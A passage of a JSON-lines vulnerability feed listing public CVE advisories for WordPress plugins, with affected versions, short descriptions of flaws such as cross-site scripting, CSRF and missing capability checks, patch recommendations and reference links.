link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.00\\\/addons\\\/cdn\\\/cdn-rewrite.php#L459\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.00\\\/addons\\\/cdn\\\/cdn-rewrite.php#L459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213738\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213738\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09c04863-a454-4f05-9403-aff39dbccd43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09c04863-a454-4f05-9403-aff39dbccd43?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13472","slug":"wc-product-table-lite","versionImpact":"3.9.4","description":"The The WooCommerce Product Table Lite plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.9.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The same 'sc_attrs' parameter is vulnerable to Reflected Cross-Site Scripting as well.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/trunk\\\/main.php#L1843\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/trunk\\\/main.php#L1843\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231930\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231930\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-product-table-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-product-table-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f1a1171-3d7b-46a4-982e-fe318e3017b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f1a1171-3d7b-46a4-982e-fe318e3017b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0954","slug":"onlinecontract","versionImpact":"5.1.4","description":"The WP Online Contract plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the json_import() and json_export() functions in all versions up to, and including, 5.1.4. This makes it possible for unauthenticated attackers to import and export the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-online-contract\\\/7698011\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-online-contract\\\/7698011\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70f464ca-ff6c-4c2e-8b56-bf5e4bc6bd1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70f464ca-ff6c-4c2e-8b56-bf5e4bc6bd1f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30552","slug":"wordpress-admin-bar-improved","versionImpact":"3.3.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in Donald Gilbert WordPress Admin Bar Improved allows Stored XSS. This issue affects WordPress Admin Bar Improved: from n\/a through 3.3.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-admin-bar-improved\\\/vulnerability\\\/wordpress-wordpress-admin-bar-improved-plugin-3-3-5-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-admin-bar-improved\\\/vulnerability\\\/wordpress-wordpress-admin-bar-improved-plugin-3-3-5-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5096","slug":"tablepress","versionImpact":"3.1.2","description":"The TablePress plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the 'data-caption', 'data-s-content-padding', 'data-s-title', and 'data-footer' data-attributes in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/datatables.net\\\/\",\"name\":\"https:\\\/\\\/datatables.net\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/blob\\\/29539c40504365bc4be0599e4b0739cf270a2e09\\\/js\\\/core\\\/core.constructor.js#L329\",\"name\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/blob\\\/29539c40504365bc4be0599e4b0739cf270a2e09\\\/js\\\/core\\\/core.constructor.js#L329\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/commit\\\/d278ed307035cb8740d2fad86b7cbb995380f7bb\",\"name\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/commit\\\/d278ed307035cb8740d2fad86b7cbb995380f7bb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/commit\\\/d558328106bef2d48dfc4cf78581dd106f5c1077\",\"name\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/commit\\\/d558328106bef2d48dfc4cf78581dd106f5c1077\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/tags\\\/3.1.2\\\/js\\\/jquery.datatables.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/tags\\\/3.1.2\\\/js\\\/jquery.datatables.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298453\\\/tablepress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298453\\\/tablepress\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tablepress.org\\\/release-announcement-tablepress-3-1-3\\\/\",\"name\":\"https:\\\/\\\/tablepress.org\\\/release-announcement-tablepress-3-1-3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tablepress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tablepress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd2dfa02-0404-4300-a5ed-6326f9df6d30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd2dfa02-0404-4300-a5ed-6326f9df6d30?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6687","slug":"magic-buttons-for-elementor","versionImpact":"1.0","description":"The Magic Buttons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's magic-button shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/magic-buttons-for-elementor\\\/trunk\\\/magic_buttons_shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/magic-buttons-for-elementor\\\/trunk\\\/magic_buttons_shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-buttons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-buttons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25eb1c89-0121-4ea5-a29a-43ec98c468ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25eb1c89-0121-4ea5-a29a-43ec98c468ee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8196","slug":"magical-addons-for-elementor","versionImpact":"1.3.8","description":"The Magical Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Custom Attributes in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334530\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334530\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magical-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magical-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58854b23-e679-4349-aa7c-4edf4008c92a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58854b23-e679-4349-aa7c-4edf4008c92a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0715","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_clone_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3728280-3487-4cb2-8e37-f33811bc0a22\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3728280-3487-4cb2-8e37-f33811bc0a22\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2433","slug":"yet-another-related-posts-plugin","versionImpact":"5.30.3","description":"The YARPP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'className' parameter in versions up to, and including, 5.30.3 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2939617\\\/yet-another-related-posts-plugin\\\/trunk\\\/classes\\\/YARPP_Core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2939617\\\/yet-another-related-posts-plugin\\\/trunk\\\/classes\\\/YARPP_Core.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35bd7462-8dab-43b2-9941-fef6f826cfdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35bd7462-8dab-43b2-9941-fef6f826cfdc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yet-another-related-posts-plugin\\\/tags\\\/5.30.3\\\/classes\\\/YARPP_Core.php#L1623\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yet-another-related-posts-plugin\\\/tags\\\/5.30.3\\\/classes\\\/YARPP_Core.php#L1623\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6390","slug":"wordpress-users","versionImpact":"1.4","description":"The WordPress Users WordPress plugin through 1.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0ca68d3-f885-46c9-9f6b-b77ad387d25d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0ca68d3-f885-46c9-9f6b-b77ad387d25d\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/2023-6390.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/2023-6390.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6969","slug":"user-shortcodes-plus","versionImpact":"2.0.2","description":"The User Shortcodes Plus plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.2 via the user_meta shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve potentially sensitive user meta.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76a0a87a-dff0-4a51-bad0-8868c342ecde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76a0a87a-dff0-4a51-bad0-8868c342ecde?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-shortcodes-plus\\\/trunk\\\/includes\\\/Shortcodes\\\/UserMeta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-shortcodes-plus\\\/trunk\\\/includes\\\/Shortcodes\\\/UserMeta.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4290","slug":"sailthru-triggermail","versionImpact":"1.1","description":"The Sailthru Triggermail WordPress plugin through 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a10d0f-d8f2-4f3e-92bf-94fc08416d87\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a10d0f-d8f2-4f3e-92bf-94fc08416d87\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10577","slug":"fat-rat-collect","versionImpact":"2.7.3","description":"The ????(Fat Rat Collect) ????????????????, ??????????????????????????? plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to missing escaping on a URL in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664d265b-7b35-4c61-b48b-d051b7fb5ebd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664d265b-7b35-4c61-b48b-d051b7fb5ebd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fat-rat-collect\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fat-rat-collect\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11974","slug":"media-library-assistant","versionImpact":"3.23","description":"The Media Library Assistant plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018smc_settings_tab', 'unattachfixit-action', and 'woofixit-action\u2019 parameters in all versions up to, and including, 3.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/mla-unattached-fixit.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/mla-unattached-fixit.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/smart-media-categories\\\/admin\\\/includes\\\/class-smc-settings-support.php#L459\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/smart-media-categories\\\/admin\\\/includes\\\/class-smc-settings-support.php#L459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/woofixit.php#L1391\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/woofixit.php#L1391\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215759\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215759\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65f4e5e1-4c2e-4943-aa84-4caa61e14bc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65f4e5e1-4c2e-4943-aa84-4caa61e14bc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23961","slug":"graph-lite","versionImpact":"2.0.8","description":"Missing Authorization vulnerability in WP Tasker WordPress Graphs & Charts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Graphs & Charts: from n\/a through 2.0.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/graph-lite\\\/vulnerability\\\/wordpress-wordpress-graphs-charts-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/graph-lite\\\/vulnerability\\\/wordpress-wordpress-graphs-charts-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30526","slug":"typekit","versionImpact":"1.2.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in lucksy Typekit plugin for WordPress allows Cross Site Request Forgery. This issue affects Typekit plugin for WordPress: from n\/a through 1.2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/typekit\\\/vulnerability\\\/wordpress-typekit-plugin-1-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/typekit\\\/vulnerability\\\/wordpress-typekit-plugin-1-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6686","slug":"magic-buttons-for-elementor","versionImpact":"1.0","description":"The Magic Buttons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's magic-button shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-buttons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-buttons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4379f2c5-3533-45f7-a4ef-0b3320eb5d04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4379f2c5-3533-45f7-a4ef-0b3320eb5d04?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7689","slug":"hydra-booking","description":"The Hydra Booking plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the tfhb_reset_password_callback() function in versions 1.1.0 to 1.1.18. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the password of an Administrator user, achieving full privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334439\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334439\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hydra-booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hydra-booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93027dd1-f36a-4954-a8d2-b77bbbaef6fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93027dd1-f36a-4954-a8d2-b77bbbaef6fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0711","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_state function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the view state of the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1c43e93-69a3-407e-860e-ab25af5d7177\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1c43e93-69a3-407e-860e-ab25af5d7177\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1323","slug":"yikes-inc-easy-mailchimp-extender","versionImpact":"6.8.8","description":"The Easy Forms for Mailchimp WordPress plugin through 6.8.8 does not sanitise and escape some of its from parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3a2af00-719c-4b86-8877-b1d68a589192\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3a2af00-719c-4b86-8877-b1d68a589192\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6389","slug":"wordpress-toolbar","versionImpact":"2.2.6","description":"The WordPress Toolbar WordPress plugin through 2.2.6 redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04dafc55-3a8d-4dd2-96da-7a8b100e5a81\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04dafc55-3a8d-4dd2-96da-7a8b100e5a81\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6389.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6389.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1318","slug":"feedzy-rss-feeds","versionImpact":"4.4.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'feedzy_wizard_step_process' and 'import_status' functions in all versions up to, and including, 4.4.2. This makes it possible for authenticated attackers, with Contributor access and above, who are normally restricted to only being able to create posts rather than pages, to draft and publish posts with arbitrary content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/181edcec-a57d-4516-935d-6777d2de77ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/181edcec-a57d-4516-935d-6777d2de77ae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-import.php#L1022\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-import.php#L1022\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php#L1053\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php#L1053\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.o